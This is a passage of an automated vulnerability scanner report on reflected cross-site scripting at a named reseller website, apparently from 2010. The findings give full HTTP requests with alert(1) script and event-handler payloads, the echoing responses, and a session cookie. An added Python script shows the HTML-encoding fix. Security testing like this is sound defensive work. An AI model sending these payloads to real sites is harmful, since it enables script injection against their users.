Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:45:17 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /web-service/other/googlepr.phpdd48c<script>alert(1)</script>f491b86b74d was not found on this server.</p>
...[SNIP]...

2.5116. http://www.resellerbase.com/web-service/other/googlepr.php [link_id parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.resellerbase.com
Path:   /web-service/other/googlepr.php

Issue detail

The value of the link_id request parameter is copied into the HTML document as plain text between tags. The payload 7e8a1<a>60907ddd55c was submitted in the link_id parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /web-service/other/googlepr.php?link_id=97e8a1<a>60907ddd55c HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:46:57 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /web-service/other/googlepr.php?link_id=97e8a1<a>60907ddd55c was not found on this server.</p>
...[SNIP]...

2.5117. http://www.resellerbase.com/web-service/other/googlepr.php [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /web-service/other/googlepr.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload 2034a<script>alert(1)</script>97d81d1569a was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /web-service/other/googlepr.php?2034a<script>alert(1)</script>97d81d1569a=1 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:44:19 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /web-service/other/googlepr.php?2034a<script>alert(1)</script>97d81d1569a=1 was not found on this server.</p>
...[SNIP]...

2.5118. http://www.resellerbase.com/web-service/other/search.php [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /web-service/other/search.php

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload ecc6d<script>alert(1)</script>90c3de35c28 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /web-serviceecc6d<script>alert(1)</script>90c3de35c28/other/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/web-service/other/?select=http%253a%252f%252fwww.resellerbase.com%252fadult%252fmedia-chat%252f
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:46:14 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /web-serviceecc6d<script>alert(1)</script>90c3de35c28/other/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.5119. http://www.resellerbase.com/web-service/other/search.php [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /web-service/other/search.php

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload b0bbf<script>alert(1)</script>f6f86395cde was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /web-service/otherb0bbf<script>alert(1)</script>f6f86395cde/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/web-service/other/?select=http%253a%252f%252fwww.resellerbase.com%252fadult%252fmedia-chat%252f
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:46:23 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /web-service/otherb0bbf<script>alert(1)</script>f6f86395cde/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.5120. http://www.resellerbase.com/web-service/other/search.php [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /web-service/other/search.php

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 6b62f<script>alert(1)</script>58cea916372 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /web-service/other/search.php6b62f<script>alert(1)</script>58cea916372?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/web-service/other/?select=http%253a%252f%252fwww.resellerbase.com%252fadult%252fmedia-chat%252f
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:46:33 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /web-service/other/search.php6b62f<script>alert(1)</script>58cea916372?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.5121. http://www.resellerbase.com/web-service/other/search.php [Submit3 parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.resellerbase.com
Path:   /web-service/other/search.php

Issue detail

The value of the Submit3 request parameter is copied into the HTML document as plain text between tags. The payload 3a271<a>90e0a5d4c3d was submitted in the Submit3 parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place. Note that the sink here is the same 404 error page (<p>The requested URL ... was not found on this server.</p>) that reflects a complete <script>alert(1)</script> payload unmodified in 2.5125 for an arbitrary parameter name on this very path, so the scanner's failure to confirm a script payload in Submit3 should be treated as a retest item rather than as evidence of filtering; the Firm rating is a limitation of the automated follow-up, not a lower-severity finding.

Request

GET /web-service/other/search.php?keyword=search...&Submit3=Search3a271<a>90e0a5d4c3d&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/web-service/other/?select=http%253a%252f%252fwww.resellerbase.com%252fadult%252fmedia-chat%252f
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:44:27 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /web-service/other/search.php?keyword=search...&Submit3=Search3a271<a>90e0a5d4c3d&opt=2 was not found on this server.</p>
...[SNIP]...

2.5122. http://www.resellerbase.com/web-service/other/search.php [cat parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /web-service/other/search.php

Issue detail

The value of the cat request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5dfd4"><img%20src%3da%20onerror%3dalert(1)>8f841d807e9 was submitted in the cat parameter. This input was echoed as 5dfd4\"><img src=a onerror=alert(1)>8f841d807e9 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document. The backslash in front of the echoed quote shows that the value went through a backslash-escaping step (consistent with PHP addslashes() or magic_quotes_gpc on this PHP 5.2.14 host) before being written into the href of the add.php link. That escaping is meaningful to a SQL or PHP string parser, not to an HTML parser: the browser reads \" as a literal backslash followed by a quote, the quote terminates the href value, and the following <img src=a onerror=alert(1)> is parsed as a new tag whose handler fires when the bogus image fails to load. The unencoded < and > in the echoed value confirm that no HTML encoding was applied at all. The fix is context-specific output encoding (htmlspecialchars() with ENT_QUOTES in PHP, which turns " into &quot;), not more backslashes.

Request

GET /web-service/other/search.php?cat=185dfd4"><img%20src%3da%20onerror%3dalert(1)>8f841d807e9&keyword=search...&Submit3=Search&opt=1 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/web-service/other/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.1 200 OK
Date: Wed, 17 Nov 2010 23:44:02 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html
Content-Length: 15014

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Browse by categories
...[SNIP]...
<a href="http://www.resellerbase.com/add.php?cat=185dfd4\"><img src=a onerror=alert(1)>8f841d807e9">
...[SNIP]...

2.5123. http://www.resellerbase.com/web-service/other/search.php [cat parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /web-service/other/search.php

Issue detail

The value of the cat request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload dac00"><img%20src%3da%20onerror%3dalert(1)>aa349ac4626e241c9 was submitted in the cat parameter. This input was echoed as dac00\"><img src=a onerror=alert(1)>aa349ac4626e241c9 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document. This is the same add.php href sink as 2.5122, reached through the sorted form of the search (sort_by and sort_order present); the backslash-escaped quote (\") again fails to keep the payload inside the attribute, because a backslash is not an escape character in HTML.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

The original request used the POST method, however it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.

Request

GET /web-service/other/search.php?cat=18dac00"><img%20src%3da%20onerror%3dalert(1)>aa349ac4626e241c9&keyword=search...&Submit3=Search&opt=1&sort_by=title&sort_order=asc HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/web-service/other/search.php?cat=18&keyword=search...&Submit3=Search&opt=1
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.1 200 OK
Date: Wed, 17 Nov 2010 23:44:31 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html
Content-Length: 32301

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Browse by categories
...[SNIP]...
<a href="http://www.resellerbase.com/add.php?cat=18dac00\"><img src=a onerror=alert(1)>aa349ac4626e241c9">
...[SNIP]...

2.5124. http://www.resellerbase.com/web-service/other/search.php [keyword parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.resellerbase.com
Path:   /web-service/other/search.php

Issue detail

The value of the keyword request parameter is copied into the HTML document as plain text between tags. The payload 16f76<a>3ac7529c360 was submitted in the keyword parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place. As with Submit3 (2.5121), the echo comes from the 404 error page's unencoded copy of the request URI, a sink that reflects a full <script> payload elsewhere in this section, so a manual retest with a script payload in keyword is the obvious next step.

Request

GET /web-service/other/search.php?keyword=search...16f76<a>3ac7529c360&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/web-service/other/?select=http%253a%252f%252fwww.resellerbase.com%252fadult%252fmedia-chat%252f
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:44:06 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /web-service/other/search.php?keyword=search...16f76<a>3ac7529c360&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.5125. http://www.resellerbase.com/web-service/other/search.php [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /web-service/other/search.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload cead3<script>alert(1)</script>3a81778d85b was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. Because the payload travels in a parameter name that the application has no reason to read, the reflection cannot be attributed to any particular input handler: the 404 page is writing the raw request URI into its <p> element, so any attacker-controlled part of the URL for this path reaches the same sink.

Request

GET /web-service/other/search.php?keyword=search...&Submit3=Search&opt=2&cead3<script>alert(1)</script>3a81778d85b=1 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/web-service/other/?select=http%253a%252f%252fwww.resellerbase.com%252fadult%252fmedia-chat%252f
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:45:48 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /web-service/other/search.php?keyword=search...&Submit3=Search&opt=2&cead3<script>alert(1)</script>3a81778d85b=1 was not found on this server.</p>
...[SNIP]...
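The following script is an added example written for this report; it is not code from the scanner output or from the resellerbase.com application. It rebuilds offline the two output contexts seen in 2.5122 (payload inside a double-quoted href) and 2.5125 (payload inside the 404 page's <p> text). The render_*_vulnerable() functions are hypothetical reconstructions of the sinks implied by the captured responses (the site's server-side source is not in the report), the *_fixed() variants apply context-correct HTML encoding with Python's html.escape() standing in for PHP htmlspecialchars() with ENT_QUOTES, and classify() parses each fragment with the standard-library html.parser to show whether a browser-style tokenizer would see a script body, an event-handler attribute, or only inert text. It also emulates PHP addslashes() so the \" artefact from the 2.5122 response can be reproduced exactly and shown to be harmless to the attacker.

```python
"""Reflected XSS in two output contexts, rebuilt offline from the report above.

Added example: not part of the scanner report or of the resellerbase.com code
base. render_*_vulnerable() are hypothetical reconstructions of the sinks the
captured responses imply; render_*_fixed() show context-correct encoding.
"""
from html import escape
from html.parser import HTMLParser

# Payloads copied from findings 2.5122 and 2.5125, as they arrived at the server.
CAT_PAYLOAD = '185dfd4"><img src=a onerror=alert(1)>8f841d807e9'
URI_PAYLOAD = ('/web-service/other/search.php?keyword=search...&Submit3=Search'
               '&opt=2&cead3<script>alert(1)</script>3a81778d85b=1')


def php_addslashes(s: str) -> str:
    """Emulate PHP addslashes() / magic_quotes_gpc: backslash before ' " \\ and NUL.

    This is the only transformation the 2.5122 response shows: the quote came
    back as \\" while < and > were untouched."""
    return (s.replace("\\", "\\\\")
             .replace("'", "\\'")
             .replace('"', '\\"')
             .replace("\x00", "\\0"))


def render_add_link_vulnerable(cat: str) -> str:
    """Attribute context, backslash-escaped only (hypothetical sink for 2.5122)."""
    return '<a href="http://www.resellerbase.com/add.php?cat=%s">' % php_addslashes(cat)


def render_add_link_fixed(cat: str) -> str:
    """Attribute context with HTML encoding: " -> &quot;, < -> &lt;, > -> &gt;."""
    return '<a href="http://www.resellerbase.com/add.php?cat=%s">' % escape(cat, quote=True)


def render_404_vulnerable(uri: str) -> str:
    """Text context: the 404 page's <p> echoes the raw request URI (hypothetical sink)."""
    return "<p>The requested URL %s was not found on this server.</p>" % uri


def render_404_fixed(uri: str) -> str:
    """Same error page with the URI HTML-encoded before it is written into the document."""
    return "<p>The requested URL %s was not found on this server.</p>" % escape(uri, quote=True)


class _TagCollector(HTMLParser):
    """Record start tags, their attributes and any <script> body, as a tokenizer would."""

    def __init__(self) -> None:
        super().__init__()
        self.tags = []           # list of (tag_name, {attr: value})
        self.script_bodies = []  # text found between <script> and </script>
        self._in_script = False

    def handle_starttag(self, tag, attrs):
        self.tags.append((tag, dict(attrs)))
        self._in_script = tag == "script"

    def handle_endtag(self, tag):
        if tag == "script":
            self._in_script = False

    def handle_data(self, data):
        if self._in_script:
            self.script_bodies.append(data)


def parse_fragment(fragment: str) -> _TagCollector:
    parser = _TagCollector()
    parser.feed(fragment)
    parser.close()
    return parser


def classify(fragment: str) -> str:
    """Return how the fragment would execute: 'script', 'event-handler' or 'inert'.

    'inert' means the payload survived only as text or as an attribute value,
    which is exactly what context-correct encoding is meant to guarantee."""
    parsed = parse_fragment(fragment)
    if parsed.script_bodies:
        return "script"
    if any(name.startswith("on") for _, attrs in parsed.tags for name in attrs):
        return "event-handler"
    return "inert"


if __name__ == "__main__":
    for label, frag in (("2.5122 as served", render_add_link_vulnerable(CAT_PAYLOAD)),
                        ("2.5122 encoded", render_add_link_fixed(CAT_PAYLOAD)),
                        ("404 page as served", render_404_vulnerable(URI_PAYLOAD)),
                        ("404 page encoded", render_404_fixed(URI_PAYLOAD))):
        print("%-20s %-14s %s" % (label, classify(frag), frag))
```

Running the block prints four lines: the two "as served" fragments classify as event-handler and script, the two encoded ones as inert. Judging the output by parsing it, rather than by searching for the payload string, mirrors what the victim's browser does: the backslash the application inserted is still present in the vulnerable href, but it changes nothing about where the attribute ends, whereas after html.escape() the parser hands back the whole payload as the href value and sees no second tag.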

2.5126. http://www.resellerbase.com/web-service/other/search.php [opt parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.resellerbase.com
Path:   /web-service/other/search.php

Issue detail

The value of the opt request parameter is copied into the HTML document as plain text between tags. The payload 6ff9a<a>1762aeba8f1 was submitted in the opt parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place. The sink is once more the 404 error page's unencoded echo of the request URI (see 2.5121); the Firm rating records only that the scanner's script-payload follow-up did not confirm, and opt should be retested by hand alongside Submit3 and keyword.

Request

GET /web-service/other/search.php?keyword=search...&Submit3=Search&opt=26ff9a<a>1762aeba8f1 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/web-service/other/?select=http%253a%252f%252fwww.resellerbase.com%252fadult%252fmedia-chat%252f
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:44:43 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /web-service/other/search.php?keyword=search...&Submit3=Search&opt=26ff9a<a>1762aeba8f1 was not found on this server.</p>
...[SNIP]...

2.5127. http://www.resellerbase.com/web-service/other/themes/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /web-service/other/themes/

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 8bbf7<script>alert(1)</script>813ddf17fd1 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. This finding and the ones that follow for /web-service/other/themes/ and its subdirectories (2.5128 to 2.5141) are one issue reported once per path segment and once per query-string name: every request lands on the same 404 error page, which copies the request URI into its body without HTML encoding. They share a single fix, HTML-encoding the URI (or omitting it) in the error document, and a single retest; until that is done the scanner will keep producing a new entry for every directory it discovers.

Request

GET /web-service8bbf7<script>alert(1)</script>813ddf17fd1/other/themes/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:44:29 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /web-service8bbf7<script>alert(1)</script>813ddf17fd1/other/themes/ was not found on this server.</p>
...[SNIP]...

2.5128. http://www.resellerbase.com/web-service/other/themes/ [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /web-service/other/themes/

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 91f57<script>alert(1)</script>7992606690e was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /web-service/other91f57<script>alert(1)</script>7992606690e/themes/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:44:40 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /web-service/other91f57<script>alert(1)</script>7992606690e/themes/ was not found on this server.</p>
...[SNIP]...

2.5129. http://www.resellerbase.com/web-service/other/themes/ [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /web-service/other/themes/

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload c7a6a<script>alert(1)</script>c94f9201f3c was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /web-service/other/themesc7a6a<script>alert(1)</script>c94f9201f3c/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:44:53 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /web-service/other/themesc7a6a<script>alert(1)</script>c94f9201f3c/ was not found on this server.</p>
...[SNIP]...

2.5130. http://www.resellerbase.com/web-service/other/themes/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /web-service/other/themes/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload 1f534<script>alert(1)</script>3ed971fff1c was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

